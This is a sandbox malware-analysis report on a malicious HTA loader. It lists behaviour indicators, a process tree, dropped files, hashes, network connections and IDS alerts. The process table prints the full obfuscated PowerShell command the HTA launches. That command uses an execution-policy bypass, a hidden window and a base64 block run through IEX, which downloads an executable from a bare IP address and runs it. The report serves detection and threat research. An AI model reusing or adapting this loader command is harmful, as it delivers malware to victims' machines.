| File name: | nextbestkissingbestthingsformebetterwaygood.hta |
| Full analysis: | https://app.any.run/tasks/bc58eee0-011b-43e5-b941-6aad63b5eb9f |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | May 16, 2025, 19:53:32 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/javascript |
| File info: | JavaScript source, ASCII text, with very long lines (37699), with no line terminators |
| MD5: | CE3C33EE170C1DE5E027CEEF2C184214 |
| SHA1: | F671ED9ECFD9A813B52DA88E530D7FC1C8D27CDA |
| SHA256: | 6DDEE61BC01DB09D1044294981F43EB8784637BEA43E19C3648E7B532E5EB3DB |
| SSDEEP: | 96:/gP4sVAGlEHB4sVcJ3RlEHbDvidfJaYWImHpW4sVRw4sV3/dlEHdwP4sVF:/gh2nPUUbDviLfnGp6QN/odwhP |
MALICIOUS
Accesses environment variables (SCRIPT)
- mshta.exe (PID: 4776)
Run PowerShell with an invisible window
- powershell.exe (PID: 7228)
Bypass execution policy to execute commands
- powershell.exe (PID: 7228)
Changes powershell execution policy (Bypass)
- cmd.exe (PID: 7172)
Request from PowerShell which ran from CMD.EXE
- powershell.exe (PID: 7228)
Starts Visual C# compiler
- powershell.exe (PID: 7228)
SUSPICIOUS
Starts CMD.EXE for commands execution
- mshta.exe (PID: 4776)
Executes script without checking the security policy
- powershell.exe (PID: 7228)
Runs shell command (SCRIPT)
- mshta.exe (PID: 4776)
Possibly malicious use of IEX has been detected
- cmd.exe (PID: 7172)
Base64-obfuscated command line is found
- cmd.exe (PID: 7172)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 7172)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 7172)
Uses .NET C# to load dll
- powershell.exe (PID: 7228)
Uses sleep to delay execution (POWERSHELL)
- powershell.exe (PID: 7228)
CSC.EXE is used to compile C# code
- csc.exe (PID: 7856)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 7228)
Executable content was dropped or overwritten
- csc.exe (PID: 7856)
- powershell.exe (PID: 7228)
Potential Corporate Privacy Violation
- powershell.exe (PID: 7228)
Connects to the server without a host name
- powershell.exe (PID: 7228)
Process requests binary or script from the Internet
- powershell.exe (PID: 7228)
Executes application which crashes
- TiWorker.exe (PID: 7928)
INFO
Reads Internet Explorer settings
- mshta.exe (PID: 4776)
Found Base64 encoded reflection usage via PowerShell (YARA)
- cmd.exe (PID: 7172)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 7228)
Checks supported languages
- csc.exe (PID: 7856)
- cvtres.exe (PID: 7884)
- TiWorker.exe (PID: 7928)
Reads the machine GUID from the registry
- csc.exe (PID: 7856)
Create files in a temporary directory
- csc.exe (PID: 7856)
- cvtres.exe (PID: 7884)
- TiWorker.exe (PID: 7928)
The executable file from the user directory is run by the Powershell process
- TiWorker.exe (PID: 7928)
Checks proxy server information
- powershell.exe (PID: 7228)
The sample compiled with english language support
- powershell.exe (PID: 7228)
Reads mouse settings
- TiWorker.exe (PID: 7928)
Creates files or folders in the user directory
- WerFault.exe (PID: 8040)
Reads the software policy settings
- slui.exe (PID: 7328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
144
Monitored processes
12
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 4488 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4776 | "C:\Windows\SysWOW64\mshta.exe" C:\Users\admin\AppData\Local\Temp\nextbestkissingbestthingsformebetterwaygood.hta {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | C:\Windows\SysWOW64\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7172 | "C:\WINDOWS\system32\cmd.exe" "/c pOWershelL -Ex bYpAss -nOp -w 1 -C dEVIcecredEnTiALdepLoymEnT.ExE ; iex($(ieX('[SysTEm.TexT.EncodING]'+[cHAr]0X3A+[chaR]0x3a+'UTf8.GEtsTRing([SysTEm.CoNvERT]'+[cHaR]58+[CHAR]0x3A+'froMbAsE64sTrINg('+[CHar]0X22+'JHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3Y1Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFliekZDT2Z4WUxTLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVUNuUVd2Vix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ6ZFpkd1pkQm9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkc2RURHIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpxdG9aeCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuMTAzLjcuMzQvMTUwL1RpV29ya2VyLmV4ZSIsIiRlbnY6VE1QXFRpV29ya2VyLmV4ZSIsMCwwKTtzdGFyVC1zbEVlUCgzKTtJbnZPa0UtSVRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpUTVBcVGlXb3JrZXIuZXhlIg=='+[chaR]0x22+'))')))" | C:\Windows\SysWOW64\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7180 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7228 | pOWershelL -Ex bYpAss -nOp -w 1 -C dEVIcecredEnTiALdepLoymEnT.ExE ; iex($(ieX('[SysTEm.TexT.EncodING]'+[cHAr]0X3A+[chaR]0x3a+'UTf8.GEtsTRing([SysTEm.CoNvERT]'+[cHaR]58+[CHAR]0x3A+'froMbAsE64sTrINg('+[CHar]0X22+'JHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3Y1Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFliekZDT2Z4WUxTLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVUNuUVd2Vix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ6ZFpkd1pkQm9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkc2RURHIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpxdG9aeCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuMTAzLjcuMzQvMTUwL1RpV29ya2VyLmV4ZSIsIiRlbnY6VE1QXFRpV29ya2VyLmV4ZSIsMCwwKTtzdGFyVC1zbEVlUCgzKTtJbnZPa0UtSVRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpUTVBcVGlXb3JrZXIuZXhlIg=='+[chaR]0x22+'))')))" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7296 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7328 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7856 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\i00y0mif.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 7884 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE84E.tmp" "c:\Users\admin\AppData\Local\Temp\CSCFF225957169F431EBE16983ECA5E9344.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 Modules
| |||||||||||||||
| 7928 | "C:\Users\admin\AppData\Local\Temp\TiWorker.exe" | C:\Users\admin\AppData\Local\Temp\TiWorker.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221225477 Modules
| |||||||||||||||
Total events
11 338
Read events
11 332
Write events
6
Delete events
0
Modification events
| (PID) Process: | (4776) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4776) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4776) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (7228) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7228) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7228) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
Executable files
3
Suspicious files
7
Text files
9
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 8040 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TiWorker.exe_55ce2d8080ff10a9f113a930f4f8ed3817cbe7e_d8632c2d_3ce5f0fa-278b-42d2-b7ef-63b4ee563217\Report.wer | — | |
MD5:— | SHA256:— | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2zf5othe.ibv.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:CFCFDC6D7C003EBD2E892F06A48C211E | SHA256:F7961924F208232C6CAB196119FFD566E7B78B28E4F644C33F9F062C10F34E8E | |||
| 8040 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE28.tmp.dmp | binary | |
MD5:53263DCC8C863A1A8983E55D34A28954 | SHA256:F691C21BE2BDE56DE4D4A4E14C814B03CA77DE4CFF5F07147AC70F4D319B00CF | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\TiWorker[1].exe | executable | |
MD5:AD60FC98CFA36FD229FD46AABC71B260 | SHA256:C17E8C6B860A83B92AD9426113FED857076924F0DE5D7ED0E6ECACD032DF67A8 | |||
| 7884 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESE84E.tmp | binary | |
MD5:C537F416B6A98A8E3EE15B128D5BEE34 | SHA256:12E4962277B18FCF2B8B3EA388E9557AC110812E1ACB85F8F9C431E493735838 | |||
| 7228 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TiWorker.exe | executable | |
MD5:AD60FC98CFA36FD229FD46AABC71B260 | SHA256:C17E8C6B860A83B92AD9426113FED857076924F0DE5D7ED0E6ECACD032DF67A8 | |||
| 7928 | TiWorker.exe | C:\Users\admin\AppData\Local\Temp\autF994.tmp | binary | |
MD5:24466CEAA754885D3AE569EF821E7103 | SHA256:B24A39DB91A037063D1EA2D79E3170C7A5290AB14C2221C1C7B34F6682854589 | |||
| 7928 | TiWorker.exe | C:\Users\admin\AppData\Local\Temp\demonetising | binary | |
MD5:24466CEAA754885D3AE569EF821E7103 | SHA256:B24A39DB91A037063D1EA2D79E3170C7A5290AB14C2221C1C7B34F6682854589 | |||
| 8040 | WerFault.exe | C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA.tmp.xml | xml | |
MD5:DBF4A73697079FE4F8538A4D294DE2C3 | SHA256:9A1C154CF6E1FCC69C5C911DD8222637A8326A54E25743425D5F96D7CABE9354 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
15
Threats
5
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4300 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
4300 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7228 | powershell.exe | GET | 200 | 146.103.7.34:80 | http://146.103.7.34/150/TiWorker.exe | unknown | — | — | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 2.16.168.124:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
5496 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.160.20:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
7228 | powershell.exe | 146.103.7.34:80 | — | — | BE | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
7228 | powershell.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
7228 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
7228 | powershell.exe | A Network Trojan was detected | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
7228 | powershell.exe | A Network Trojan was detected | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
7228 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |